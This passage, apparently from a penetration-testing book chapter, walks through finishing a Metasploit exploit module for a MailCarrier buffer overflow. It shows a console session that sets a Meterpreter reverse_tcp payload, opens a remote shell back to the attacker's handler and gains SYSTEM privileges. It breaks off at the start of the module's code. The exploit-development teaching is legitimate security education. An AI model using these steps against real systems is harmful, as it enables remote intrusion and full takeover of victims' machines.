224
Chapter 15
Figure 15-3: Randomized MailCarrier buffer
The
payload.encoded
function tells Metasploit to append the indicated
payload to the end of the malicious string at run time.
Now, when we load our module, set a real payload, and execute it, we
should be presented with our hard-earned shell, as shown here:
msf exploit(mailcarrier_book) >
set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mailcarrier_book) >
exploit
[*] Started reverse handler on 192.168.1.101:4444
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.155:1265)
meterpreter >
getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Our Completed Module
Just to wrap things up, here is the complete and final code for this Metasploit
exploit module:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp